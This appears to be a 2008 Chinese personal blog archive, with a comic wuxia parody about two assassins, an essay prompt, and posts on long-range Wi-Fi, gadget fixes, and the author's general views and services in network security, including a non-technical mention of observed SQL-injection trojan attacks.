叶闲花又道:"你以为我和你扯淡是因为我害怕,以为我脱掉衣服是想色诱你,其实这都是为了拖延时间让药水能扩散到你周围。"
秋细雨面上不动声色,道:"难道你自己不怕药水的厉害?"
叶闲花得意地道:"一开始我涂的口红就是解药,所以我仍然可以自由行动。"
叶闲花逼视着秋细雨,问道:"现在你还认为你能杀了我么?"
秋细雨道:"我能。"
叶闲花道:"你不能动而我能动,你却能杀了我,这不是很好笑么?"
秋细雨道:"是很好笑,但是你一定会被我杀死。"
叶闲花道:"为什么我会被你杀死?"
秋细雨忽然反问道:"飞刀能不能杀人?"
叶闲花道:"好像能。"
秋细雨道:"我有没有手?"
叶闲花道:"的确有。"
秋细雨道:"我手上有没有刀?"
叶闲花道:"你手上好像只有指甲刀。"
秋细雨道:"足够了。"
叶闲花道:"足够了?"
秋细雨道:"我有手有刀,就能置人死地。"
叶闲花道:"指甲刀也能杀人?实在可笑!"
秋细雨道:"以前江湖中有七十三个人觉得我这把指甲刀很可笑。"
叶闲花道:"现在呢?"
秋细雨道:"现在人都已死了,死在这把刀下。"
叶闲花道:"你的手还能动?"
秋细雨道:"你要不要试试?"
叶闲花脸上的笑容渐渐凝固,忽然间,她已出手!
一招"冒牌九阴白骨爪"直逼秋细雨天灵盖,这一招她已练过七年四个月零二十九天,她完全有把握相信没有任何人可以抵挡得了这一招。
可这一次她错了。
刀光一闪,"盗版小李飞刀"已插入她的咽喉。
她到死也不相信,一把指甲刀可以要了她的命!
闲花终于落地!
三个时辰后,药水的药效渐渐淡去,秋细雨终于可以动弹了。
望着叶闲花的尸体,秋细雨道:"虽然你已经死了,但是我还要告诉你两件事。第一,我一直用甲刀修整着手指甲是为了调整手和刀之间的同步率,说白了就是找手感。第二,我杀你的真正目的不是为了钱或者名利。"
一边说,秋细雨一边从叶闲花衣服的口袋里搜出了刘翔的奥运会入场证。
秋细雨坚定地说:"我爱北京,我要看奥运!"
题目:"细雨湿衣看不见,闲花落地听无声"是唐朝诗人刘长卿在《别严士元》中的诗句。曾经有人这样理解这句诗:1、这是歌颂春天的美好意境。2、闲花、细雨表达了不为人知的寂寞。3、看不见、听不见不等于无所作为,是一种恬淡的处世之道。4、这种意境已经不适合当今的世界……根据你的看法写一篇作文。题目自拟,体裁不限。字数800以上。
盛夏,夜,深夜。
景山山颠。
山上有人,两个人,一男一女。
这两人就是当今武林名声最响的两位杀手,男的名秋细雨,女的叫叶闲花,江湖人称"细雨闲花"。
诗人刘长卿曾用"细雨湿衣看不见,闲花落地听无声"来描述这两个可怕的杀手。细雨湿衣,湿衣的是鲜血;闲花落地,落地的是人头。这两人杀人来无影去无踪,如果他们想杀你,当你还没看到他们人影没听到他们声音的时候,你就已经死了。
秋细雨三天前接到一份帖子,指名要杀叶闲花。事成之后,不但有三百万两冥币,更可以让他在"红楼梦中人"选秀节目中担任曹雪芹的角色!
但是杀死叶闲花比杀死比尔还要难得多。
江湖中没有一个人清楚叶闲花的武功来历,性格脾气,但是每个人都知道叶闲花的故事。
叶闲花有一双迷人的大眼睛,据说她曾一动不动地瞪死过赵薇和高圆圆,而那一年她才十七岁。
叶闲花声音有如黄莺般幽婉醉人,传说听过她说话后林志玲身体酥麻了整整一年,你说要不要命?
叶闲花轻功独步武林,踏雪无痕,落地无声,号称超过当年青翼蝠王韦一笑。有人见她上星期在高速公路上偷了刘翔奥运会入场证,刘翔追出一万公里最后被活活累倒。
一般人听到叶闲花的故事早就吓得去买尿不湿了,但是秋细雨没有去买。
秋细雨不是一般人。
他知道,杀人不但要靠技术,还要拼人品!
秋细雨很镇定,他正用一把指甲刀修整着手指甲,他的手指修长有力。
他要等待,等待对方先沉不住气。高手相争,不允许一丝一毫的失误,先沉不住气的人就会露出破绽。
致命的破绽!
因此秋细雨一言不发,只是静静地玩弄着指甲刀。
没想到叶闲花更是好整以暇,自己悠然自得地涂口红,喷香水。
秋细雨只好先发制人,道:"你知道我找你出来是为什么。"
叶闲花温柔道:"在我们动手之前,不能先谈谈么?"
秋细雨道:"我是来杀人的,不是来聊天的。"
叶闲花道:"你有把握杀我?"
秋细雨道:"我从不做没有把握的事情。"
叶闲花道:"我要提醒你一件事。"
秋细雨道:"你说。"
叶闲花道:"百晓生作杀手谱,小女子是杀手榜排名第一,阁下区区第二,你真能杀得了我么?"
秋细雨道:"我也要提醒你一件事。"
叶闲花道:"你说。"
秋细雨道:"论杀手实力,我本在你之前,只是那次排名百晓生采用了短信投票系统,中国''人数过于庞大才让你得了第一。"
叶闲花的脸色一变,道:"我更要提醒你,我的粉丝团叫'花粉',不叫''!"
秋细雨道:"我最后要提醒你,你的那些'花粉'全都是。还有,我们已经跑题了。"
叶闲花道:"我们这样拼命厮杀,你难道不怕麻烦么?"
秋细雨道:"你以后再也不用怕麻烦了,天下只有一种人永远不怕麻烦,死人!"
叶闲花道:"这么说你非逼我出手不可?"
秋细雨没有回答,他已不用回答。
秋细雨道:"亮兵器!"
叶闲花道:"我用刀。"
秋细雨道:"你用刀?刀在何处?"
叶闲花道:"我就是刀!"
叶闲花露出甜甜的笑容,忽然间褪下了自己的衣服,全身上下只剩下蕾丝比基尼和黑色丝袜。
叶闲花的脸美得让人窒息,再配上这样的身材,这样的服饰,充满了一种原始的诱惑力。
她的眼睛会说话,她的媚笑会说话,她的手,她的胸膛,她的腿……她身上每分每寸都会说话。
她知道,只要是个不瞎的男人,现在肯定会被她迷得神魂颠倒。
秋细雨是个男人,而且是个不瞎的男人。
可他现在却偏偏好像瞎了一样,完全无动于衷。
他知道,美丽的女人是一把刀,当你沉醉的时候,刀就会切进你的胸口。
秋细雨沉吟道:"我只想问你一件事。"
叶闲花娇笑着:"请讲。"
秋细雨道:"大夏天的,穿这么少你丫不怕蚊子叮啊?"
叶闲花沉默了半晌,幽幽地道:"你一定以为刚才我在喷香水,是不是?我告诉你,我喷的是六神花露水!"
叶闲花又道:"不过这不是普通的六神,是我特别提炼的药水,无色无味无毒,不过却会慢慢扩散在空气中,闻到它的人会四肢麻痹不能动弹。"
秋细雨一惊,忽然觉得身体已经麻木不听使唤,不由得一身汗。
叶闲花又道:"你以为我和你扯淡是因为我害怕,以为我脱掉衣服是想色诱你,其实这都是为了拖延时间让药水能扩散到你周围。"
秋细雨面上不动声色,道:"难道你自己不怕药水的厉害?"
叶闲花得意地道:"一开始我涂的口红就是解药,所以我仍然可以自由行动。"
叶闲花逼视着秋细雨,问道:"现在你还认为你能杀了我么?"
秋细雨道:"我能。"
叶闲花道:"你不能动而我能动,你却能杀了我,这不是很好笑么?"
秋细雨道:"是很好笑,但是你一定会被我杀死。"
叶闲花道:"为什么我会被你杀死?"
秋细雨忽然反问道:"飞刀能不能杀人?"
叶闲花道:"好像能。"
秋细雨道:"我有没有手?"
叶闲花道:"的确有。"
秋细雨道:"我手上有没有刀?"
叶闲花道:"你手上好像只有指甲刀。"
秋细雨道:"足够了。"
叶闲花道:"足够了?"
秋细雨道:"我有手有刀,就能置人死地。"
叶闲花道:"指甲刀也能杀人?实在可笑!"
秋细雨道:"以前江湖中有七十三个人觉得我这把指甲刀很可笑。"
叶闲花道:"现在呢?"
秋细雨道:"现在人都已死了,死在这把刀下。"
叶闲花道:"你的手还能动?"
秋细雨道:"你要不要试试?"
叶闲花脸上的笑容渐渐凝固,忽然间,她已出手!
一招"冒牌九阴白骨爪"直逼秋细雨天灵盖,这一招她已练过七年四个月零二十九天,她完全有把握相信没有任何人可以抵挡得了这一招。
可这一次她错了。
刀光一闪,"盗版小李飞刀"已插入她的咽喉。
她到死也不相信,一把指甲刀可以要了她的命!
闲花终于落地!
三个时辰后,药水的药效渐渐淡去,秋细雨终于可以动弹了。
望着叶闲花的尸体,秋细雨道:"虽然你已经死了,但是我还要告诉你两件事。第一,我一直用甲刀修整着手指甲是为了调整手和刀之间的同步率,说白了就是找手感。第二,我杀你的真正目的不是为了钱或者名利。"
一边说,秋细雨一边从叶闲花衣服的口袋里搜出了刘翔的奥运会入场证。
秋细雨坚定地说:"我爱北京,我要看奥运!"
2008年6月29日星期日
使用普通定向天线,加上稍微修改协议,可将WIFI通讯连接100公里
使用普通定向天线,加上稍微修改协议,可将WIFI通讯连接100公里
这是07年3月份intel完成的一项测试。不过,无需修改协议,使用效果更好的卫星天线+蝶形定向,老外已经成功了 125英里的测试。
英特尔推出一种Wi-Fi,能够让旧金山的笔记本电脑从加州圣琼斯的基站处连接互联网。还可以在此基础上多增加大约10英里的传输距离。
英特尔英特尔伯克利研究室主任Eric Brewer 说,实验室学者与研究人员已经开发出一种系统,这种系统能够将Wi-Fi 信号的传输距离由原来的几百英尺提高到100 公里。
他说:"它使用了普通的Wi-Fi 硬件,但我们调整了软件。"
为了演示这一成果,英特尔在伯克利市中心的实验室和伯克利大学的空间科学实验室之间建立起了一个连接。实验室的接收器包括一个定位天线组成,它负责连接经过修改过的无线接入点。
这套系统不是英特尔为美国和欧洲开发的,相反,它是芯片巨人面向发展中国家市场的一种技术。绝大多数发展中国家的通讯架构都比较的薄弱,而且多集中于城市。而这些国家许多人口都居住在乡村,这些地方与世隔绝,仅能通过汽车,巴士或者步行与外界保持联系。
Brewer说,这些Wi-Fi 天线是连接链条中重要的组成部分。乡村居民可以在自己的村子连接一个Wi-Fi 天线,而后这些信号被中转至其他地方,直到乡村的电脑与互联网连接上。
在某种意义上,这样的长途Wi-Fi 天线所扮演的功能和WiMax 相同。两者的区别是,WiMax 基站的成本大约为1.5 万美元至2 万美元。而长途Wi-Fi 基站的成本仅为7 百至8 百美元。
此外,长途Wi-Fi 传输速度要更快一些。WiMax 使用的无线电频段是由地方电信部分规定的,建设,提供WiMax 服务需要获得政府的许可。
而Wi-Fi 的使用则无需频段使用许可。因此,农村地区的用户能够大量的连接上网。在一些国家,比如巴基斯坦,Wi-Fi 可以作为WiMax 的一种补充。
英特尔正准备在今年年底,在乌干达进行此项技术的测试工作。
工作原理英特尔长途Wi-Fi 技术与一般的Wi-Fi 技术的一个巨大不同就是长途信号的方向性:英特尔将这些信号由一个天线调谐到另外一个天线。而普通的Wi-Fi 天线在它周围360 度的范围内发射信号。
创建一种直线的信号传输并不容易。天线需要被非常精确的排列组合,如果两个天线之间有障碍物,那么Wi-Fi 信号的传输就会被影响。
英特尔伯克利实验室的一名科学家Alan Mainwaring 说:"排列这些天线很困难。我们碰到的第一件事情就是发射塔附近有小孩玩耍。"
最终,英特尔开发出了一种"可操纵的"天线。这并不是说物理的天线可以被操纵,而是说,发射站之间的信号被一种电信号所引导。用电子操纵信号的优势是,物理的天线可以不必对齐排列,甚至被斜插在地上也不会影响信号的完整性。
英特尔实验室已经制作了一些L 形的支架等木料,公司将很快推出第二代的天线。(可操纵天线技术出自俄罗斯下诺夫哥罗德大学教授,Alexey Umnov. 英特尔在这个城市设有研究机构。)
另外,英特尔已经修改了原来Wi-Fi 通讯的许多协议与规程,克服了原来的缺陷。比如,英特尔已经取消了原来Wi-Fi 网络中的"信号交换"(Handshaking )与"碰撞检测"(Collision Detection )的概念。
这是07年3月份intel完成的一项测试。不过,无需修改协议,使用效果更好的卫星天线+蝶形定向,老外已经成功了 125英里的测试。
英特尔推出一种Wi-Fi,能够让旧金山的笔记本电脑从加州圣琼斯的基站处连接互联网。还可以在此基础上多增加大约10英里的传输距离。
英特尔英特尔伯克利研究室主任Eric Brewer 说,实验室学者与研究人员已经开发出一种系统,这种系统能够将Wi-Fi 信号的传输距离由原来的几百英尺提高到100 公里。
他说:"它使用了普通的Wi-Fi 硬件,但我们调整了软件。"
为了演示这一成果,英特尔在伯克利市中心的实验室和伯克利大学的空间科学实验室之间建立起了一个连接。实验室的接收器包括一个定位天线组成,它负责连接经过修改过的无线接入点。
这套系统不是英特尔为美国和欧洲开发的,相反,它是芯片巨人面向发展中国家市场的一种技术。绝大多数发展中国家的通讯架构都比较的薄弱,而且多集中于城市。而这些国家许多人口都居住在乡村,这些地方与世隔绝,仅能通过汽车,巴士或者步行与外界保持联系。
Brewer说,这些Wi-Fi 天线是连接链条中重要的组成部分。乡村居民可以在自己的村子连接一个Wi-Fi 天线,而后这些信号被中转至其他地方,直到乡村的电脑与互联网连接上。
在某种意义上,这样的长途Wi-Fi 天线所扮演的功能和WiMax 相同。两者的区别是,WiMax 基站的成本大约为1.5 万美元至2 万美元。而长途Wi-Fi 基站的成本仅为7 百至8 百美元。
此外,长途Wi-Fi 传输速度要更快一些。WiMax 使用的无线电频段是由地方电信部分规定的,建设,提供WiMax 服务需要获得政府的许可。
而Wi-Fi 的使用则无需频段使用许可。因此,农村地区的用户能够大量的连接上网。在一些国家,比如巴基斯坦,Wi-Fi 可以作为WiMax 的一种补充。
英特尔正准备在今年年底,在乌干达进行此项技术的测试工作。
工作原理英特尔长途Wi-Fi 技术与一般的Wi-Fi 技术的一个巨大不同就是长途信号的方向性:英特尔将这些信号由一个天线调谐到另外一个天线。而普通的Wi-Fi 天线在它周围360 度的范围内发射信号。
创建一种直线的信号传输并不容易。天线需要被非常精确的排列组合,如果两个天线之间有障碍物,那么Wi-Fi 信号的传输就会被影响。
英特尔伯克利实验室的一名科学家Alan Mainwaring 说:"排列这些天线很困难。我们碰到的第一件事情就是发射塔附近有小孩玩耍。"
最终,英特尔开发出了一种"可操纵的"天线。这并不是说物理的天线可以被操纵,而是说,发射站之间的信号被一种电信号所引导。用电子操纵信号的优势是,物理的天线可以不必对齐排列,甚至被斜插在地上也不会影响信号的完整性。
英特尔实验室已经制作了一些L 形的支架等木料,公司将很快推出第二代的天线。(可操纵天线技术出自俄罗斯下诺夫哥罗德大学教授,Alexey Umnov. 英特尔在这个城市设有研究机构。)
另外,英特尔已经修改了原来Wi-Fi 通讯的许多协议与规程,克服了原来的缺陷。比如,英特尔已经取消了原来Wi-Fi 网络中的"信号交换"(Handshaking )与"碰撞检测"(Collision Detection )的概念。
2008年6月27日星期五
2008年6月24日星期二
幼儿园的孩子不让喝水
天很热,但老师不让孩子喝水,小孩喝了水,没多长时间就得跑趟厕所,麻烦
这位幼儿园的老师是谁呢?是某单位最大领导书记老婆的司机的外甥的媳妇,还真是一人得道,鸡犬不宁呢,而且人家幼儿园到了这个单位的幼儿园,也混成领导。
家长无奈地说,等X书记过两年退了,到时非掳了她不可。
呵呵,咱SB的很,没在官场混过,感觉这些事儿真是有特色,这就是所谓的中国官场吧。前些天不是热传阜阳的白宫事件吗?举报人一郁闷据说自杀了。孩子被老师绑架,我们又被官场绑架,谁说我们不是活在幸福中啊?
这位幼儿园的老师是谁呢?是某单位最大领导书记老婆的司机的外甥的媳妇,还真是一人得道,鸡犬不宁呢,而且人家幼儿园到了这个单位的幼儿园,也混成领导。
家长无奈地说,等X书记过两年退了,到时非掳了她不可。
呵呵,咱SB的很,没在官场混过,感觉这些事儿真是有特色,这就是所谓的中国官场吧。前些天不是热传阜阳的白宫事件吗?举报人一郁闷据说自杀了。孩子被老师绑架,我们又被官场绑架,谁说我们不是活在幸福中啊?
2008年6月22日星期日
treo上面的java问题
treo使用palm系统,速度快,功能全,是个很棒的商务工具,盼望着还能用上五年,所以加了铁壳保护着,看上去比较傻。
palm系统用java比较麻烦,比较飞信,ucweb,还有做做客什么的,安装了ibm java for palm,基本功能可以用了,但下载的那些jar文件,jad文件,还是不能直接用在上面,可以用ibm java for palm里面的一个套件,名叫jartoprc转化为prc文件格式。
转化后,发现还是不能用。有许多报错,许多时候甚至会直接重启。这时用winrar打开jar文件,把一个javax的文件夹拖进去保存好,然后再转化就成功了。ibm java for palm比较旧,跟不上现在大部分手机上用的那种JAVA,缺少的就是这个javax里面的一堆文件,大约有十来个class,补充后,就一切正常了。
palm系统用java比较麻烦,比较飞信,ucweb,还有做做客什么的,安装了ibm java for palm,基本功能可以用了,但下载的那些jar文件,jad文件,还是不能直接用在上面,可以用ibm java for palm里面的一个套件,名叫jartoprc转化为prc文件格式。
转化后,发现还是不能用。有许多报错,许多时候甚至会直接重启。这时用winrar打开jar文件,把一个javax的文件夹拖进去保存好,然后再转化就成功了。ibm java for palm比较旧,跟不上现在大部分手机上用的那种JAVA,缺少的就是这个javax里面的一堆文件,大约有十来个class,补充后,就一切正常了。
2008年6月21日星期六
最近比较流行的攻击行为
最近我这台老旧的tp600又出力了,通过分析,发现了大量的sql注入攻击,和以前不一样,是专门针对各门网站的自动注入攻击,攻击成功后,会放入frame进行网页挂马。挂马后,大部分是窃取账号信息一类的木马,不过现在的木马可以在线升级,版本繁多,估计功能肯定不止这一点儿,控制功能估计也是有的。
要是哪一家的网站用的是asp+ sql,请一定注意一下,最后网站有没有异常,或者,尽快联系我,给我找个兼职的机会,哈。
要是哪一家的网站用的是asp+ sql,请一定注意一下,最后网站有没有异常,或者,尽快联系我,给我找个兼职的机会,哈。
2008年6月20日星期五
事业的几条原则
最近听几个哥们说某些部门的某些人比较牛,在我看来,他们只是掌握了十多年前二十几年前的手法罢了,要是了解一些最新的攻击方法 ,也不用做成现在这副样子了。国内的网络安全风险,也不会到触目惊心的程度了。
于是,定下几条原则:
1.坚决不做涉密项目。后边的麻烦事太多,会很不爽。
2.与官僚保持适当距离,可以帮政府事业单位做一些事情,但不陷入,保持适当距离,增强自己的技术敏感嗅觉。
3.向金融方向努力,尽自己的力量,保护好经济方面的信息资源。
4.给中小企业提供防护,原因同上。
5.每周至少看一本书,每天把订阅的rss看完,阅读量和实践结合,把思路付诸现实。
6.远离酒场,事先想好各种托辞,尽快逃离。 能力没有增长,身体受到损害,时间浪费严重。关于人脉的问题,只要我的能力足够牛,总会找到帮助别人机会的,不需要求别人。
7.积极向上,个性一些即使看上去很SB,坚持自己的研究
于是,定下几条原则:
1.坚决不做涉密项目。后边的麻烦事太多,会很不爽。
2.与官僚保持适当距离,可以帮政府事业单位做一些事情,但不陷入,保持适当距离,增强自己的技术敏感嗅觉。
3.向金融方向努力,尽自己的力量,保护好经济方面的信息资源。
4.给中小企业提供防护,原因同上。
5.每周至少看一本书,每天把订阅的rss看完,阅读量和实践结合,把思路付诸现实。
6.远离酒场,事先想好各种托辞,尽快逃离。 能力没有增长,身体受到损害,时间浪费严重。关于人脉的问题,只要我的能力足够牛,总会找到帮助别人机会的,不需要求别人。
7.积极向上,个性一些即使看上去很SB,坚持自己的研究
现在的网络安全防护模式非常落后
现在的防护方法,基本还停留在特征识别上面。现在看市场上的杀毒软件吧。整天做特征码的升级,没有哪个杀毒软件不做吧。也经常会查出什么什么病毒的变种?所谓变种而已,其实破坏模式,感染模式和变种前的母体没有什么变化,为什么还要通过升级特征码来识别呢?这充分说明了,现在的杀毒软件没有足够的行为识别能力。换个马甲就不认识了吗?换个马甲太容易了,加个壳,改个名,去个关键字就OK了,大家可以研究一下,做个病毒是多少的容易。为什么非要靠特征呢?计算机的本体属性决定的,现在的计算机软件系统,还无法生成智能,所以在行为分析方法的能力很弱,啥时候发展出可以生长的智慧模式了,我相信,那时的安全领域会有较大变化。人工智能程序真的那么难做吗?不一定,只是与现在的强逻辑性的程序开发,模式上有所不同,大家还没有开放思维而已。哈,扯的远了,还是回来看看,现在的攻击方法,有哪些变化?
1. 基于行为分析的防护方法太少,设备的缺陷。自动化,打包,海量
在刚才也说了,几乎所有的安全设备,都是基于特征的,防火墙是基于特征,符合规则的包或接受或拒绝或转发。入侵检测是基于特征的,防病毒也是基于特征的,匹配到符合特征的,就报出来,没匹配到就PASS。为什么基于行为分析的设备很少呢?因为行为分析要求的智商比较高,普通计算机的强逻辑模式很难处理,它提供的选择太多,缺少轻重缓急,设备毕竟是傻的,所以还得发挥人的能力。暂时上,人在模糊处理,归纳总结的能力上面,要比机器快的多。一个新事件,人可以根据已有的知识结构,快速地进行分析判断,而机器的长处在于重复性,而短于创新。
从这方面说,现在的安全防护设备,还有很长的路要走?
或者说,即使现在的特征模式这么弱,你怎么判断你的系统没有被入侵呢?杀毒没报,防火墙没异常,你就没被入侵吗?计算机上有哪些异常,一般人会去查看吗?会去分析你load的那一大dll是干什么的吗?相信干网络安全的同行,也很少去折腾这个吧?
哪位要是有人脉,可以交流一下,可以给大家演示一下,最新的攻击手法,现在的安全防护模式无法阻断的,如何进入与internet隔离的专网(有哪些专网,大家想想),如何进入知名网站如.........等,现在国内的网络风险非常大,大的让你吃不好睡不着
新的行为分析防护模式,如何识别这些攻击,如何评估现在企事业单位存在问题,如何解决,如何进行有效防护。。。。
说到这儿,首先声明,这些变化都是我个人总结的,不一定正确。我脱离安全领域也好几年了,这些年跟国内的同行交流的很少,一直闷头玩自个儿感兴趣的东西,所以一些想法可能有些脱离实际。所以,说到哪儿有不正确或偏颇的地方,请大家指出来,咱们做更多的交流,大家都在这一块儿有共同的提高
1. 基于行为分析的防护方法太少,设备的缺陷。自动化,打包,海量
在刚才也说了,几乎所有的安全设备,都是基于特征的,防火墙是基于特征,符合规则的包或接受或拒绝或转发。入侵检测是基于特征的,防病毒也是基于特征的,匹配到符合特征的,就报出来,没匹配到就PASS。为什么基于行为分析的设备很少呢?因为行为分析要求的智商比较高,普通计算机的强逻辑模式很难处理,它提供的选择太多,缺少轻重缓急,设备毕竟是傻的,所以还得发挥人的能力。暂时上,人在模糊处理,归纳总结的能力上面,要比机器快的多。一个新事件,人可以根据已有的知识结构,快速地进行分析判断,而机器的长处在于重复性,而短于创新。
从这方面说,现在的安全防护设备,还有很长的路要走?
或者说,即使现在的特征模式这么弱,你怎么判断你的系统没有被入侵呢?杀毒没报,防火墙没异常,你就没被入侵吗?计算机上有哪些异常,一般人会去查看吗?会去分析你load的那一大dll是干什么的吗?相信干网络安全的同行,也很少去折腾这个吧?
哪位要是有人脉,可以交流一下,可以给大家演示一下,最新的攻击手法,现在的安全防护模式无法阻断的,如何进入与internet隔离的专网(有哪些专网,大家想想),如何进入知名网站如.........等,现在国内的网络风险非常大,大的让你吃不好睡不着
新的行为分析防护模式,如何识别这些攻击,如何评估现在企事业单位存在问题,如何解决,如何进行有效防护。。。。
说到这儿,首先声明,这些变化都是我个人总结的,不一定正确。我脱离安全领域也好几年了,这些年跟国内的同行交流的很少,一直闷头玩自个儿感兴趣的东西,所以一些想法可能有些脱离实际。所以,说到哪儿有不正确或偏颇的地方,请大家指出来,咱们做更多的交流,大家都在这一块儿有共同的提高
2008年6月19日星期四
更刺激和更有乐趣的
现在在安全管理、咨询等等上面,搞的规模越来越大,好多的琐碎事情,其实,应该把理论与有针对性的评估结合起来,突出重点,有针对性地对客户的信息资产进行努力。
我能提供的,是入侵防护、安全评估、系统防御、系统优化、系统网络异常故障解决、入侵损害恢复,数据恢复与保护,抗ddos攻击、紧急响应等系统网络安全服务,通俗上理解就是提供有价值的服务。 针对中小企业,还可以提供高性能自建网站服务器、邮件服务器、流量管理与分析统计、透明网关、网站加速网关、防病毒网关、防火墙、VPN、入侵检测、漏洞扫描、方案与咨询、技术支持、系统网络应用难题等服务。实际上,针对客户在安全上的需求,我可以提供大量我已经做出的产品,一些更加高端的东西,可以去代理渠道。如果用户对价格特别敏感,就会对我做出来的安全产品感兴趣。我的想法,是根据用户的需求,提供相应的解决方法和实施过程,这样的思路才是真正解决用户存在的问题
虽然累一些,收益也不高,但做这些东西,不是更刺激?更有乐趣吗?
我能提供的,是入侵防护、安全评估、系统防御、系统优化、系统网络异常故障解决、入侵损害恢复,数据恢复与保护,抗ddos攻击、紧急响应等系统网络安全服务,通俗上理解就是提供有价值的服务。 针对中小企业,还可以提供高性能自建网站服务器、邮件服务器、流量管理与分析统计、透明网关、网站加速网关、防病毒网关、防火墙、VPN、入侵检测、漏洞扫描、方案与咨询、技术支持、系统网络应用难题等服务。实际上,针对客户在安全上的需求,我可以提供大量我已经做出的产品,一些更加高端的东西,可以去代理渠道。如果用户对价格特别敏感,就会对我做出来的安全产品感兴趣。我的想法,是根据用户的需求,提供相应的解决方法和实施过程,这样的思路才是真正解决用户存在的问题
虽然累一些,收益也不高,但做这些东西,不是更刺激?更有乐趣吗?
升级了最新的intel pro/wireless 3945ABG网卡驱动出现问题
升级了最新的intel pro/wireless 3945ABG网卡驱动出现问题,ibm access connect 无法使用,最后找到这么一篇文章后解决问题了。
http://www-307.ibm.com/pc/support/site.wss/document.do?sitestyle=lenovo&lndocid=MIGR-64439
除了google,我们可以追踪access connect调用一个dll文件时,出现错误了。解决方法 的重点,在于把dll放到Ibm管理程序可以找到的地方
http://www-307.ibm.com/pc/support/site.wss/document.do?sitestyle=lenovo&lndocid=MIGR-64439
除了google,我们可以追踪access connect调用一个dll文件时,出现错误了。解决方法 的重点,在于把dll放到Ibm管理程序可以找到的地方
2008年6月18日星期三
2008年6月17日星期二
行为分析的安全防护模式
哪位要是有人脉,可以交流一下,可以给大家演示一下,最新的攻击手法,现在的安全防护模式无法阻断的,如何进入与internet隔离的专网(有哪些专网,大家想想),如何进入知名网站如.........等,现在国内的网络风险非常大,大的让你吃不好睡不着
新的行为分析防护模式,如何识别这些攻击,如何评估现在企事业单位存在问题,如何解决,如何进行有效防护。。。。
新的行为分析防护模式,如何识别这些攻击,如何评估现在企事业单位存在问题,如何解决,如何进行有效防护。。。。
2008年6月16日星期一
2008年6月14日星期六
没赚钱的时候,享受上岛咖啡
还没有开始赚钱,就已经开始向往享受了。坐在两岸咖啡的店里,感觉环境挺安静,适合一个人在这儿静静地想东西,在外面骑着电动车久了,身上一层土,灰头土脸,目光也浑浊起来,思维都变的罗索了。前几天写东西,觉的前言不搭后语的。现在坐在这儿,又有点儿感觉了,受着据说比较白领的环境感染,也感觉自个儿暂时白领了,可以来个思考的话题了。
上午给哥们儿做网络安全的公司讲了一番现在最新的攻击手法,中间插了一段华为介绍安全产品。想不到华为没用几年,就做了这么多东西,速度真是快啊。不过,现在的安全防护模式太落后,至少国内绝大部分的安全模式非常落后。几年没和国内的同行交流,感觉在这一块儿进步不大。
把我知道的攻击手段总结了七种,都是现在的防护模式无法有效防御的。讲完第一部分,感觉还是别讲了,这些东西泄露出去,很不好,可能被人利用了。反正大家 知道就行了,上了防火墙脚、入侵检测、VPN、防病毒,离安全要求还差的远,国内的很多机构,还存在很多很大的安全风险,包括专网专用的各个重要部门。为了证明如何进行专网,还做了个演示,如何通过手机,连入专用网络中,让大家看看,这一切的操作都是多么简单,只要几个步骤就可以了。不过,我对渗透测试攻击测试不感兴趣,真正有意思的,还是与攻击者斗智斗勇的过程,哈,这个多刺激啊。所以,我了解的攻击手段虽然吓人,但还不是最先进的,最有威胁性的,现实中,可能还会有更多更深的威胁存在。不用说各个部门的决策者不知道,干网络安全这一行好多年的人,都不知道呢。
不喜欢给安全或公安部门做活,每次都是拉去白干,折腾这么长时间,也没点儿费用,追踪黑客,入侵损害恢复哪儿那么容易啊,就是按个开始运行,怎么着也得费心费力吧。咱骑着电动车灰头土脸的容易吗?也得想办法养家糊口啊。多少专项资金几百几千万的资金,那么多的钱做出来的东西,还不如我蹲在家里用一晚上搞出来的效果好,这就是严酷的现实啊。
可以说,现在大部分的网络环境,计算机,手机,PDA,mp3,电话,传真,打印机,ATM。。。。。很多问题都是存在问题的,有些非常严重。有些信息资产,已经受到损害,以为"西方敌对势力"都在沉默着呢?只是现在的安全防护模式无法有效发现而已,再加上缺少我这方面的专有人才,哈,基本上,只要出什么大事,国内的许多系统,会死的很惨。明显的攻击者,会造成非常大的破坏。不要以为这些东西会距离你很远,离重要部门,离老百姓都很近,近到影响你的水电煤气交通通信钱包。。。近到影响到你会发狂。
另一部分,我是不是得了迫害妄想症?大家生活都好好的,哪有这么多事情,痴傻一些,得过且过吧
上午给哥们儿做网络安全的公司讲了一番现在最新的攻击手法,中间插了一段华为介绍安全产品。想不到华为没用几年,就做了这么多东西,速度真是快啊。不过,现在的安全防护模式太落后,至少国内绝大部分的安全模式非常落后。几年没和国内的同行交流,感觉在这一块儿进步不大。
把我知道的攻击手段总结了七种,都是现在的防护模式无法有效防御的。讲完第一部分,感觉还是别讲了,这些东西泄露出去,很不好,可能被人利用了。反正大家 知道就行了,上了防火墙脚、入侵检测、VPN、防病毒,离安全要求还差的远,国内的很多机构,还存在很多很大的安全风险,包括专网专用的各个重要部门。为了证明如何进行专网,还做了个演示,如何通过手机,连入专用网络中,让大家看看,这一切的操作都是多么简单,只要几个步骤就可以了。不过,我对渗透测试攻击测试不感兴趣,真正有意思的,还是与攻击者斗智斗勇的过程,哈,这个多刺激啊。所以,我了解的攻击手段虽然吓人,但还不是最先进的,最有威胁性的,现实中,可能还会有更多更深的威胁存在。不用说各个部门的决策者不知道,干网络安全这一行好多年的人,都不知道呢。
不喜欢给安全或公安部门做活,每次都是拉去白干,折腾这么长时间,也没点儿费用,追踪黑客,入侵损害恢复哪儿那么容易啊,就是按个开始运行,怎么着也得费心费力吧。咱骑着电动车灰头土脸的容易吗?也得想办法养家糊口啊。多少专项资金几百几千万的资金,那么多的钱做出来的东西,还不如我蹲在家里用一晚上搞出来的效果好,这就是严酷的现实啊。
可以说,现在大部分的网络环境,计算机,手机,PDA,mp3,电话,传真,打印机,ATM。。。。。很多问题都是存在问题的,有些非常严重。有些信息资产,已经受到损害,以为"西方敌对势力"都在沉默着呢?只是现在的安全防护模式无法有效发现而已,再加上缺少我这方面的专有人才,哈,基本上,只要出什么大事,国内的许多系统,会死的很惨。明显的攻击者,会造成非常大的破坏。不要以为这些东西会距离你很远,离重要部门,离老百姓都很近,近到影响你的水电煤气交通通信钱包。。。近到影响到你会发狂。
另一部分,我是不是得了迫害妄想症?大家生活都好好的,哪有这么多事情,痴傻一些,得过且过吧
2008年6月13日星期五
最新攻击事件,先安在咱们头上了。实际上老美也没有把握确定是谁干的
WASHINGTON — Hackers believed to be operating from China have broken into computers in Congress, apparently in search of information on Chinese dissidents, two Republican lawmakers said yesterday.
The hackers were not identified, but one of the lawmakers, Rep. Chris Smith of New Jersey, a senior Republican on the House Foreign Affairs Committee, said he believed that all signs pointed to the Chinese government.
